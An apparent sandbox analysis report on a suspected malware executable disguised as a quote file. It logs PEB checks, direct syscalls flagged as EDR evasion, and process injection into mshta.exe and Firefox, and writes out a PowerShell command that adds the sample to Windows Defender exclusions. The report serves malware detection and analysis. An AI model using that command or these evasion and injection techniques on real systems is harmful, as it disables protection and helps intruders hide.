            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017EA8E4 mov eax, dword ptr fs:[00000030h]4_2_017EA8E4
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174E8C0 mov eax, dword ptr fs:[00000030h]4_2_0174E8C0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017F08C0 mov eax, dword ptr fs:[00000030h]4_2_017F08C0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017AC89D mov eax, dword ptr fs:[00000030h]4_2_017AC89D
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01720887 mov eax, dword ptr fs:[00000030h]4_2_01720887
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0171CB7E mov eax, dword ptr fs:[00000030h]4_2_0171CB7E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017F2B57 mov eax, dword ptr fs:[00000030h]4_2_017F2B57
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017F2B57 mov eax, dword ptr fs:[00000030h]4_2_017F2B57
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017F2B57 mov eax, dword ptr fs:[00000030h]4_2_017F2B57
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017F2B57 mov eax, dword ptr fs:[00000030h]4_2_017F2B57
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017CEB50 mov eax, dword ptr fs:[00000030h]4_2_017CEB50
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017D4B4B mov eax, dword ptr fs:[00000030h]4_2_017D4B4B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017D4B4B mov eax, dword ptr fs:[00000030h]4_2_017D4B4B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B6B40 mov eax, dword ptr fs:[00000030h]4_2_017B6B40
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B6B40 mov eax, dword ptr fs:[00000030h]4_2_017B6B40
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017EAB40 mov eax, dword ptr fs:[00000030h]4_2_017EAB40
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017C8B42 mov eax, dword ptr fs:[00000030h]4_2_017C8B42
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174EB20 mov eax, dword ptr fs:[00000030h]4_2_0174EB20
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174EB20 mov eax, dword ptr fs:[00000030h]4_2_0174EB20
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017E8B28 mov eax, dword ptr fs:[00000030h]4_2_017E8B28
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017E8B28 mov eax, dword ptr fs:[00000030h]4_2_017E8B28
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179EB1D mov eax, dword ptr fs:[00000030h]4_2_0179EB1D
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179EB1D mov eax, dword ptr fs:[00000030h]4_2_0179EB1D
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179EB1D mov eax, dword ptr fs:[00000030h]4_2_0179EB1D
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179EB1D mov eax, dword ptr fs:[00000030h]4_2_0179EB1D
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179EB1D mov eax, dword ptr fs:[00000030h]4_2_0179EB1D
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179EB1D mov eax, dword ptr fs:[00000030h]4_2_0179EB1D
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179EB1D mov eax, dword ptr fs:[00000030h]4_2_0179EB1D
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179EB1D mov eax, dword ptr fs:[00000030h]4_2_0179EB1D
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179EB1D mov eax, dword ptr fs:[00000030h]4_2_0179EB1D
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01728BF0 mov eax, dword ptr fs:[00000030h]4_2_01728BF0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01728BF0 mov eax, dword ptr fs:[00000030h]4_2_01728BF0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01728BF0 mov eax, dword ptr fs:[00000030h]4_2_01728BF0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174EBFC mov eax, dword ptr fs:[00000030h]4_2_0174EBFC
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017ACBF0 mov eax, dword ptr fs:[00000030h]4_2_017ACBF0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017CEBD0 mov eax, dword ptr fs:[00000030h]4_2_017CEBD0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01740BCB mov eax, dword ptr fs:[00000030h]4_2_01740BCB
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01740BCB mov eax, dword ptr fs:[00000030h]4_2_01740BCB
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01740BCB mov eax, dword ptr fs:[00000030h]4_2_01740BCB
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01720BCD mov eax, dword ptr fs:[00000030h]4_2_01720BCD
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01720BCD mov eax, dword ptr fs:[00000030h]4_2_01720BCD
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01720BCD mov eax, dword ptr fs:[00000030h]4_2_01720BCD
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730BBE mov eax, dword ptr fs:[00000030h]4_2_01730BBE
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730BBE mov eax, dword ptr fs:[00000030h]4_2_01730BBE
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017D4BB0 mov eax, dword ptr fs:[00000030h]4_2_017D4BB0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017D4BB0 mov eax, dword ptr fs:[00000030h]4_2_017D4BB0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179CA72 mov eax, dword ptr fs:[00000030h]4_2_0179CA72
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0179CA72 mov eax, dword ptr fs:[00000030h]4_2_0179CA72
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175CA6F mov eax, dword ptr fs:[00000030h]4_2_0175CA6F
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175CA6F mov eax, dword ptr fs:[00000030h]4_2_0175CA6F
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175CA6F mov eax, dword ptr fs:[00000030h]4_2_0175CA6F
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017CEA60 mov eax, dword ptr fs:[00000030h]4_2_017CEA60
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01726A50 mov eax, dword ptr fs:[00000030h]4_2_01726A50
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01726A50 mov eax, dword ptr fs:[00000030h]4_2_01726A50
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01726A50 mov eax, dword ptr fs:[00000030h]4_2_01726A50
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01726A50 mov eax, dword ptr fs:[00000030h]4_2_01726A50
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01726A50 mov eax, dword ptr fs:[00000030h]4_2_01726A50
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01726A50 mov eax, dword ptr fs:[00000030h]4_2_01726A50
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01726A50 mov eax, dword ptr fs:[00000030h]4_2_01726A50
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730A5B mov eax, dword ptr fs:[00000030h]4_2_01730A5B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01730A5B mov eax, dword ptr fs:[00000030h]4_2_01730A5B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01744A35 mov eax, dword ptr fs:[00000030h]4_2_01744A35
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01744A35 mov eax, dword ptr fs:[00000030h]4_2_01744A35
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175CA38 mov eax, dword ptr fs:[00000030h]4_2_0175CA38
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175CA24 mov eax, dword ptr fs:[00000030h]4_2_0175CA24
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0174EA2E mov eax, dword ptr fs:[00000030h]4_2_0174EA2E
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017ACA11 mov eax, dword ptr fs:[00000030h]4_2_017ACA11
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175AAEE mov eax, dword ptr fs:[00000030h]4_2_0175AAEE
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0175AAEE mov eax, dword ptr fs:[00000030h]4_2_0175AAEE
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01720AD0 mov eax, dword ptr fs:[00000030h]4_2_01720AD0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01754AD0 mov eax, dword ptr fs:[00000030h]4_2_01754AD0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01754AD0 mov eax, dword ptr fs:[00000030h]4_2_01754AD0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01776ACC mov eax, dword ptr fs:[00000030h]4_2_01776ACC
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01776ACC mov eax, dword ptr fs:[00000030h]4_2_01776ACC
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01776ACC mov eax, dword ptr fs:[00000030h]4_2_01776ACC
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01728AA0 mov eax, dword ptr fs:[00000030h]4_2_01728AA0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01728AA0 mov eax, dword ptr fs:[00000030h]4_2_01728AA0
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01776AA4 mov eax, dword ptr fs:[00000030h]4_2_01776AA4
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01758A90 mov edx, dword ptr fs:[00000030h]4_2_01758A90
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172EA80 mov eax, dword ptr fs:[00000030h]4_2_0172EA80
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172EA80 mov eax, dword ptr fs:[00000030h]4_2_0172EA80
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172EA80 mov eax, dword ptr fs:[00000030h]4_2_0172EA80
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172EA80 mov eax, dword ptr fs:[00000030h]4_2_0172EA80
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172EA80 mov eax, dword ptr fs:[00000030h]4_2_0172EA80
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172EA80 mov eax, dword ptr fs:[00000030h]4_2_0172EA80
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172EA80 mov eax, dword ptr fs:[00000030h]4_2_0172EA80
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172EA80 mov eax, dword ptr fs:[00000030h]4_2_0172EA80
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_0172EA80 mov eax, dword ptr fs:[00000030h]4_2_0172EA80
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017F4A80 mov eax, dword ptr fs:[00000030h]4_2_017F4A80
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_017B8D6B mov eax, dword ptr fs:[00000030h]4_2_017B8D6B
            Source: C:\Users\user\Desktop\QUOTE2342534.exeCode function: 4_2_01720D59 mov eax, dword ptr fs:[00000030h]4_2_01720D59
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe"
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe"Jump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtUnmapViewOfSection: Direct from: 0x76EF2D3CJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\QUOTE2342534.exeMemory written: C:\Users\user\Desktop\QUOTE2342534.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: NULL target: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeSection loaded: NULL target: C:\Windows\SysWOW64\mshta.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: NULL target: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: NULL target: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\mshta.exeThread register set: target process: 2672Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\mshta.exeThread APC queued: target process: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe"Jump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeProcess created: C:\Users\user\Desktop\QUOTE2342534.exe "C:\Users\user\Desktop\QUOTE2342534.exe"Jump to behavior
            Source: C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: qnPyaKsYTE.exe, 00000007.00000002.4593878902.0000000001441000.00000002.00000001.00040000.00000000.sdmp, qnPyaKsYTE.exe, 00000007.00000000.2155548995.0000000001441000.00000002.00000001.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594454649.0000000000EC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: qnPyaKsYTE.exe, 00000007.00000002.4593878902.0000000001441000.00000002.00000001.00040000.00000000.sdmp, qnPyaKsYTE.exe, 00000007.00000000.2155548995.0000000001441000.00000002.00000001.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594454649.0000000000EC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: qnPyaKsYTE.exe, 00000007.00000002.4593878902.0000000001441000.00000002.00000001.00040000.00000000.sdmp, qnPyaKsYTE.exe, 00000007.00000000.2155548995.0000000001441000.00000002.00000001.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594454649.0000000000EC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: qnPyaKsYTE.exe, 00000007.00000002.4593878902.0000000001441000.00000002.00000001.00040000.00000000.sdmp, qnPyaKsYTE.exe, 00000007.00000000.2155548995.0000000001441000.00000002.00000001.00040000.00000000.sdmp, qnPyaKsYTE.exe, 0000000A.00000002.4594454649.0000000000EC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\QUOTE2342534.exeQueries volume information: C:\Users\user\Desktop\QUOTE2342534.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\QUOTE2342534.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
